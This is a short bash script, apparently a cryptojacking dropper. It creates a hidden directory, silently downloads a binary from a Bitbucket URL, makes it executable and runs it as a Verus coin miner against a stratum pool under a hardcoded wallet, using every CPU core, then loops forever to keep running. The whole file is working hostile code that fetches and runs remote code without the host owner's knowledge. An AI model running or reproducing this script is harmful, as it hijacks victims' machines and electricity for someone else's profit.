#!/bin/bash
mkdir .kap && cd .kap
wget -O bubux https://bitbucket.org/buyyy/didieu/downloads/bct >/dev/null 2>&1
chmod 777 bubux
./bubux -a verus -o stratum+tcp://cn.vipor.net:5077 -u RSaAjB1zYPF9wEwdbb9UQQGoia5Hp4YpiV.UYEY -t $(nproc --all)
while [ 1 ]; do
sleep 3
done
sleep 999
